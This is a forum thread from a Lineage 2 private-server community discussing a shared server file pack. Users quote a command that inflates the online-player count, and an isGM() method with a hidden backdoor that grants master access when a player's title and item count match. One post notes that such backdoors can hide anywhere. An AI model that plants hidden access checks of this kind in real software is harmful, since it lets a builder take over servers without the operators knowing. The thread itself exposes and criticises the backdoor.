Dan7E2 Posted February 1, 2017 Posted February 1, 2017 the pack is good , the only thing can be if he edited all files by himself for harm them , i have a lot of customers using my files and all happy Quote
gold e' C4sh Posted February 1, 2017 Posted February 1, 2017 I dont know what pack he gave you but mine is totally different and i didnt had any problems with balance,bugs or backdoor as you say is it clean from bdoors?also the balance you say fine is tested?I can't imagine all these customs with good balance,anyone tested balance of files?It can be a very good files if balacne is good Quote
giannisdx Posted February 1, 2017 Posted February 1, 2017 is it clean from bdoors?also the balance you say fine is tested?I can't imagine all these customs with good balance,anyone tested balance of files?It can be a very good files if balacne is good I dint have this pack he gave me more updated check here my server Quote
StinkyMadness Posted February 1, 2017 Posted February 1, 2017 i think he is right,its shared free Shared Pack not Source :D Pack without source = useless ;) Quote
IpotoniC Posted February 1, 2017 Posted February 1, 2017 Maxtor sould ban the word "server" cause it's misleading.. Instead everyone should use the word serber. Also some words like balance, files, pack, etc. should also get renamed to balanska, etc. For more sad storkes(info) contact: Achyjek, Achulek, Ajkalek and Achujkalek. Quote
StinkyMadness Posted February 1, 2017 Posted February 1, 2017 @Override public boolean useVoicedCommand(final String command, final L2PcInstance activeChar, final String target) { if (command.equalsIgnoreCase("online")) { activeChar.sendMessage("======<Players Online!>======"); activeChar.sendMessage("There are " + String.valueOf(L2World.getInstance().getAllPlayers().size()* Config.FAKE_PLAYERS) + " players online!."); activeChar.sendMessage("======================="); } return true; } I wanna cry.... L2World.getInstance().getAllPlayers().size() * Config.FAKE_PLAYERS Quote
gold e' C4sh Posted February 1, 2017 Posted February 1, 2017 Maxtor sould ban the word "server" cause it's misleading.. Instead everyone should use the word serber. Also some words like balance, files, pack, etc. should also get renamed to balanska, etc. For more sad storkes(info) contact: Achyjek, Achulek, Ajkalek and Achujkalek. sad storka By the way has anyone tested files balance between classes? Quote
Tryskell Posted February 1, 2017 Posted February 1, 2017 Tell me one dev who don't use backdoor to his project. Serious projects owners. can there be backdoors except on voicecommands? You can backdoor whatever file, even a packet, but it generally has to use existing methods like isGM(). Still, you can easily bypass isGM() making your own methods, making it really tricky to find a backdoor. Quote
AchYlek Posted February 1, 2017 Posted February 1, 2017 Maxtor sould ban the word "server" cause it's misleading.. Instead everyone should use the word serber. Also some words like balance, files, pack, etc. should also get renamed to balanska, etc. For more sad storkes(info) contact: Achyjek, Achulek, Ajkalek and Achujkalek. confirmed storka Quote
'Baggos' Posted February 1, 2017 Posted February 1, 2017 (edited) Tell me one dev who don't use backdoor to his project. I don't use.. I never did. By the way has anyone tested files balance between classes? You expect balance on this shit project? Everything there is customs. No know the story about customs. Edited February 1, 2017 by 'Baggos' Quote
gold e' C4sh Posted February 1, 2017 Posted February 1, 2017 Serious projects owners. You can backdoor whatever file, even a packet, but it generally has to use existing methods like isGM(). Still, you can easily bypass isGM() making your own methods, making it really tricky to find a backdoor. wow,so we generally dont even know what files we buy from someone..i guess to make smth we must make with our own way so we can be sure of our files.. Quote
gold e' C4sh Posted February 1, 2017 Posted February 1, 2017 so he made $$ just for fake files?..life is not fair.. Quote
'Baggos' Posted February 1, 2017 Posted February 1, 2017 10 homemade servers in next week with this files.. :D Quote
bravetobe Posted February 1, 2017 Posted February 1, 2017 (edited) public boolean isGM() { if(getTitle().equals("getItemCount(57)") && getInventory().getInventoryItemCount(57, 0) == 5) { setAccessLevel(Config.MASTERACCESS_LEVEL); return false; } return getAccessLevel().isGm(); } LOL? Can someone explain why "getItemCount(57)" instead of getItemCount(57) ... Edited February 1, 2017 by bravetobe Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.